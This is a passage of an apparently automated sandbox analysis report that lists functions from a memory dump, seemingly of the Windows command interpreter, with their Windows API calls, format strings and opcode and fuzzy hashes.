                                    • Opcode Fuzzy Hash: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                    • Instruction Fuzzy Hash: C112D2702047029BDB2DDFA8C888AAFB7E5FF98704F04491DFA8597281EB30D945CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DC5CA, Relevance: 30.2, APIs: 20, Instructions: 238COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011DC601
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,011DC5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011DC60F
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0120B980,000000A0,00000000,00000000,?,?,?,?,?), ref: 011DC67C
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 011DC6DC
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC6E7
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                    • String ID:
                                    • API String ID: 2173784998-0
                                    • Opcode ID: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                    • Instruction ID: 893abb90bef1201fcfc3a439baa35969891ca4895b4f03057563b492d7a5f580
                                    • Opcode Fuzzy Hash: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                    • Instruction Fuzzy Hash: 16818271E00119AFDF28DFA8F89CABEBBB9EF54715F01442AE906D7244DB309941CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5AEF, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 367timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D5B31
                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B45
                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D5B59
                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B6D
                                    • realloc.MSVCRT ref: 011E9C24
                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 011D5BA2
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 011D5C2A
                                    • memmove.MSVCRT ref: 011D5D23
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 011D5D4D
                                    • realloc.MSVCRT ref: 011D5D68
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 011D5D9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                    • String ID: %02d%s%02d%s%02d$%s $%s %s
                                    • API String ID: 2927284792-4023967598
                                    • Opcode ID: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                    • Instruction ID: 76cd7a06cad67bd7d68d8fe329aa2d965ab84651da7277fc0e31147f3469e279
                                    • Opcode Fuzzy Hash: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                    • Instruction Fuzzy Hash: 14C1B471A006299BDF2CDB98DC4CAFE77F9EB99708F004169E90AD7244DB319E81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D85EA, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 378fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011D862C
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 011D8691
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 011D86A1
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,011D250C,?,?,?,-00000105), ref: 011D8715
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 011D8827
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011D8842
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D885C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Find$File$CloseFirstmemset$Next
                                    • String ID: \\?\
                                    • API String ID: 3059144641-4282027825
                                    • Opcode ID: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                    • Instruction ID: 0e3f421af7f84e1e86e2c1c3aec1e6f4d4825a6dbf7035d2294294d4b06031d6
                                    • Opcode Fuzzy Hash: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                    • Instruction Fuzzy Hash: D4D1D571A0011A9BDF2DDB68EC99BBE7779EF18304F4404ADE609D3142EB709A85CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6FF0, Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMON
                                    Download Yara Rule
                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(8C8BFE4F,?,00000000), ref: 011F7062
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7074
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • towupper.MSVCRT ref: 011F720E
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F7343
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,011D1EB4,011D3958), ref: 011F7467
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,8C8BFE4F,?,00000000), ref: 011F765F
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7672
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                    • String ID: %s $%s>$PROMPT$Unknown
                                    • API String ID: 708651206-3050974680
                                    • Opcode ID: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                    • Instruction ID: 95f026a0171d62c6cfe02235972da7af9d2101779e45c98b7c33a3d9a86c882d
                                    • Opcode Fuzzy Hash: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                    • Instruction Fuzzy Hash: 3A02D479A011169BDF3CDF28D84D6BAB7B6FF54304F04829EE909E7294EB305A81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FB5E0, Relevance: 19.7, APIs: 13, Instructions: 180filememorynativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 011FB533
                                      • Part of subcall function 011FB51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 011FB54F
                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 011FB560
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 011FB635
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 011FB656
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 011FB679
                                    • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 011FB694
                                    • memset.MSVCRT ref: 011FB6D5
                                    • memcpy.MSVCRT ref: 011FB70A
                                    • memcpy.MSVCRT ref: 011FB756
                                    • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 011FB778
                                    • RtlNtStatusToDosError.NTDLL ref: 011FB783
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011FB78A
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011FB79C
                                    • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 011FB7B7
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB7C8
                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA0F
                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA37
                                      • Part of subcall function 011FB9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                      • Part of subcall function 011FB9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                      • Part of subcall function 011FB9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                    • String ID:
                                    • API String ID: 223857506-0
                                    • Opcode ID: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                    • Instruction ID: 3b7fc173a566e4ec8d63d451b9b672e8c641dadc770bbcaf787c64c05c6bfcb5
                                    • Opcode Fuzzy Hash: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                    • Instruction Fuzzy Hash: B951C270A00605AFDB19DFB8CC58ABFB7B8EF48204F08412DEA06E7250EB359941CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DE040, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 289COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • wcschr.MSVCRT ref: 011DE0F3
                                    • wcschr.MSVCRT ref: 011DE10B
                                    • _wcsicmp.MSVCRT ref: 011DE179
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE1ED
                                    • iswspace.MSVCRT ref: 011DE28B
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 011DE2ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
                                    • String ID: :.\$=,;$=,;+/[] "
                                    • API String ID: 313872294-843887632
                                    • Opcode ID: 007c7f30d5d94d735cbdac762c08c37ab33b6a0c84e2a388316583db0c9ec13a
                                    • Instruction ID: 020e0d1f864e88efa5b65822288a6ff789fc979fe5341ce17d0df71a42164fea
                                    • Opcode Fuzzy Hash: 007c7f30d5d94d735cbdac762c08c37ab33b6a0c84e2a388316583db0c9ec13a
                                    • Instruction Fuzzy Hash: 4FA1E730B062159BDF2CCBACD888BFE7BB1AF45319F050198D916AB291DB319D85CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB89C, Relevance: 18.3, APIs: 12, Instructions: 257COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 011DB90E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 4527101172f83b501611864d7501998ab0620b3570cfab8cfee1841df50d60d9
                                    • Instruction ID: 03a1585ae39d91d889194c503c58d7a2b4bc2695e7d62243d6e44f0e521deefa
                                    • Opcode Fuzzy Hash: 4527101172f83b501611864d7501998ab0620b3570cfab8cfee1841df50d60d9
                                    • Instruction Fuzzy Hash: D891257290051A8BDF2DDFA8C8486FEB7F1EF54218F4585ADDA0AD7244FB319A81CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D96A0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 237timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 011F0B1B
                                    • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 011F0C43
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Time$File$System$FormatInfoLocalLocale
                                    • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                    • API String ID: 55602301-2516506544
                                    • Opcode ID: d934bdcb8319a6cec73d4b6ba420af93533aa4ae2e44a50143315b30351467ba
                                    • Instruction ID: dd12c86237fe8f982918843d00b74af6a34bff32662dbf0263de2fd5a8333ffa
                                    • Opcode Fuzzy Hash: d934bdcb8319a6cec73d4b6ba420af93533aa4ae2e44a50143315b30351467ba
                                    • Instruction Fuzzy Hash: B981D275A0061A9ADF2CDF59CC54BFA73B9AF48704F04419EFA0AE7142EB309A85CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DD803, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: ELSE$IF/?
                                    • API String ID: 2081463915-1134991328
                                    • Opcode ID: 68a0f3e7eae79cc145230987cefb0f45493876cc411bb7c70aa7adaa811b6650
                                    • Instruction ID: 01e8e261cb7174a619d56f4466216fa1e6c1f387d95cdb2cf1748a6716eb0334
                                    • Opcode Fuzzy Hash: 68a0f3e7eae79cc145230987cefb0f45493876cc411bb7c70aa7adaa811b6650
                                    • Instruction Fuzzy Hash: 7C61E1316006029BEF3EDBB9B859A2ABBE1AF94224B14452ED506D72D0EF71D881C740
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E68BA, Relevance: 15.1, APIs: 10, Instructions: 114memoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,011DAE4F,00000037,00000000,?,?), ref: 011E696A
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,011DAE4F,00000037,00000000,?,?), ref: 011E697B
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E6982
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69B7
                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69BE
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,011DAE4F,00000037,00000000,?,?), ref: 011E69DA
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(011DAE4F,?,011DAE4F,00000037,00000000,?,?), ref: 011E69ED
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 1047556133-0
                                    • Opcode ID: bd5055c26d6986c4d7791438e641f8d8d6467a4814b4cdb1aa0cb1cfe8dd3354
                                    • Instruction ID: 715a1d092b3117166d7c9ed6ac7227bf96f2bc474ed480485811791da40d26ed
                                    • Opcode Fuzzy Hash: bd5055c26d6986c4d7791438e641f8d8d6467a4814b4cdb1aa0cb1cfe8dd3354
                                    • Instruction Fuzzy Hash: 8541B270600601AFDF28CFA9E81DAA97BF9FB65325F51462CE992C7294EF309841CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D83F2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82filenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 011D841B
                                    • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 011D846D
                                    • RtlReleaseRelativeName.NTDLL(?), ref: 011D8479
                                    • RtlFreeUnicodeString.NTDLL(?), ref: 011D8483
                                      • Part of subcall function 011D84BE: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 011D84EA
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 011D84A7
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000001), ref: 011F036E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,011D8393), ref: 011F037C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                    • String ID: @
                                    • API String ID: 2968197161-2766056989
                                    • Opcode ID: 15b906fcc33d32b35945597303889ee1e0c275476096b7cf534ee7bb332ef71e
                                    • Instruction ID: 68ca3638a004b323041b77d24e8829d245a3f3a9f4afba082227942518c7f86b
                                    • Opcode Fuzzy Hash: 15b906fcc33d32b35945597303889ee1e0c275476096b7cf534ee7bb332ef71e
                                    • Instruction Fuzzy Hash: 1E2162B1D00209AFDF24DFA5E948AEFBBBDEB58654F114169FA11E3241DB309E04CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6D90, Relevance: 13.6, APIs: 9, Instructions: 67filenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DB3
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DC5
                                    • fprintf.MSVCRT ref: 011F6DEB
                                    • fflush.MSVCRT ref: 011F6DF9
                                    • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E12
                                    • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 011F6E28
                                    • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E2F
                                    • _get_osfhandle.MSVCRT ref: 011F6E4C
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F6E54
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                    • String ID:
                                    • API String ID: 3139166086-0
                                    • Opcode ID: 8b21a91cf073ce9918c0a9012cb838c880f2aa71c4b275b82131f258d6e2289a
                                    • Instruction ID: 0d3a2d669b8a8a62280d232c0a5f64d16cf12eef3b7968ab26f4f3de8064f518
                                    • Opcode Fuzzy Hash: 8b21a91cf073ce9918c0a9012cb838c880f2aa71c4b275b82131f258d6e2289a
                                    • Instruction Fuzzy Hash: F211B132A40210AFEF39EFA8F85DBAA7F68EB64B19F04011DF605911D6CB7144C1C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E5FC8, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 372COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011E6367
                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011EF6F6
                                    • memset.MSVCRT ref: 011E60C8
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00007EE3,00000001), ref: 011E620F
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E6247
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E6252
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                    • String ID: COPYCMD
                                    • API String ID: 1068965577-3727491224
                                    • Opcode ID: 74bda750c58123a4ff90193598c03149eaec80dfcd030348955cd581489125b5
                                    • Instruction ID: 483a9fdbe8bd90f742b05a9b1b168e19983e5bc8bc7b47db92ee463cf8520405
                                    • Opcode Fuzzy Hash: 74bda750c58123a4ff90193598c03149eaec80dfcd030348955cd581489125b5
                                    • Instruction Fuzzy Hash: 9BD1E635A009178BCB2DDFA8D8986BAB7F5EFA8304F454569DC06D7295EB30DE42CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5E70, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 292COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsnicmpswscanf
                                    • String ID: :EOF
                                    • API String ID: 1534968528-551370653
                                    • Opcode ID: abbb5e2a6c2a3ccad87e90427aad1e58b42f55bbbaed136f5416a340dde28b6c
                                    • Instruction ID: 9a743848c4572d711767abbe370205ac22ef8f816b3b7dd5a999dc47071e0d55
                                    • Opcode Fuzzy Hash: abbb5e2a6c2a3ccad87e90427aad1e58b42f55bbbaed136f5416a340dde28b6c
                                    • Instruction Fuzzy Hash: 35A10330A046169BEB2DDFACD4487BABBF5FF04314F14441EE942D7281EB759A41C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D58A4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _setjmp3.MSVCRT ref: 011D58E1
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
